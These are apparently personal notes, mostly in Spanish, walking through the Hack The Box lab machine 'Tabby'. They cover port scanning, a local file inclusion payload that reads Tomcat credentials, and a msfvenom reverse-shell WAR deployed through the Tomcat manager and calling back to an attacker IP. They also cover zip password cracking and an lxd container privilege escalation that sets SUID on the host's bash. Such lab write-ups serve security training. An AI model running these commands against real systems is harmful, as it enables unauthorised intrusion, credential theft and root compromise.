echo "10.129.23.72 tabby.htb" | sudo tee -a /etc/hosts

nmap -A -p- -oA output 10.129.23.72 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA mirai 10.129.23.72

nmap -sU -O -p- -oA mirai-udp 10.129.23.72 [[nmap_udp_scan]]

nikto -h 10.129.23.72:80

gobuster dir -u http://10.129.23.72 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 40 -o scans/gobuster-root-
med

Vemos el enlace para news es diferente

Agrego esa ip a etc/hosts

10.129.23.72 megahosting.htb

Vamos a ver si podemos hacer un ataque de LFI. Es decir cuando una aplicacion usa un archivo como parametro introducido por el usuario. Vamos agregar

../../../../../etc/passwd

al URL.

https://github.com/swisskyrepo/PayloadsAllTheThings

curl http://megahosting.htb/news.php?file=../../../../etc/tomcat9/tomcat-users.xml

curl http://megahosting.htb/news.php?file=../../../../etc/tomcat9/tomcat-users.xml

Esto se usa para eoan Ubuntu

curl -u 'tomcat:$3cureP4s5w0rd123!' http://10.129.23.72:8080/manager/text/list

Tiene acceso a manager-script y podemos ver la lista http://tomcat.apache.org/tomcat-9.0-doc/manager-howto.html#Supported_Manager_Commands

msfvenom -p java/shell_reverse_tcp lhost=10.10.14.125 lport=443 -f war -o rev.10.10.14.125-443.war

Ahora le hacemos un deploy con curl

curl -u 'tomcat:$3cureP4s5w0rd123!' http://10.129.23.72:8080/manager/text/deploy?path=/cu3rv0x --upload-file rev.10.10.14.125-443.war 

• -u 'tomcat:$3cureP4s5w0rd123!' - las credenciales
• /manager/text/deploy - el path para el comando deploy
• ?path=/cu3rv0x - el path donde uno quiere que viva la aplicacion
• --upload-file rev.10.10.14.125-443.war - archivo war donde quiero subir con los commandos HTTP PUT

http://megahosting.htb:8080/cu3rv0x

rlwrap nc -lvnp 443

python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl z
stty raw -echo
fg
export TERM=xterm

Vemos que news.php sube archivos en el directorio de files

Trato de hacerle un unzip a backup.zip pero no lo logre

crear un servidor en la maquina en la cual estoy atacando python3 -m http.server 8888

wget http://10.129.23.72:8888/16162020_backup.zip

Bajar el archivo en mi maquina de kali

Usar fcrackzip para conseguir la contrasena

fcrackzip -D -p /usr/share/wordlists/rockyou.txt 16162020_backup.zip

unzip 16162020_backup.zip

su - ash
Password: admin@it

Creamos un contenedor de lxc

cd /opt
git clone https://github.com/saghul/lxd-alpine-builder.git

https://github.com/saghul/lxd-alpine-builder

Para que en verdad funcione esto tuve que hacer lo siguiente cd lxd-alpine-builder sudo ./build-alpine si te sale un error de rootfs sudo mkdir rootfs/usr/share/alpine-mirrors sudo vim rootfs/usr/share/alpine-mirrors/MIRRORS.txt copiar la lista encontrada aqui http://dl-cdn.alpinelinux.org/alpine/MIRRORS.txt

crear un servidor en python python3 -m http.server 7777

 cd /dev/shm
 wget 10.10.14.125/alpine-v3.13-x86_64-20210411_1036.tar.gz

lxc image import /dev/shm/alpine-v3.13-x86_64-20210411_1036.tar.gz --alias cu3rv0x-image

lxd init
lxc init cu3rv0x-image container-cu3rv0x -c security.privileged=true
lxc config device add container-cu3rv0x device-cu3rv0x disk source=/ path=/mnt/root

Creamos un contenedor con las siguientes opciones:

• init - inicidando el contenedor
• cu3rv0x-image - imagen ha empezar
• container-cu3rv0x - alias del contenedor
• -c security.privileged=true - con esto podemos correr el contenedor como root

lxc list

lxc start container-cu3rv0x
lxc list

lxc exec container-0xdf /bin/sh

cd /mnt/root

cd /mnt/root/usr/bin chmod 4755 bash

exit
whoami
bash -p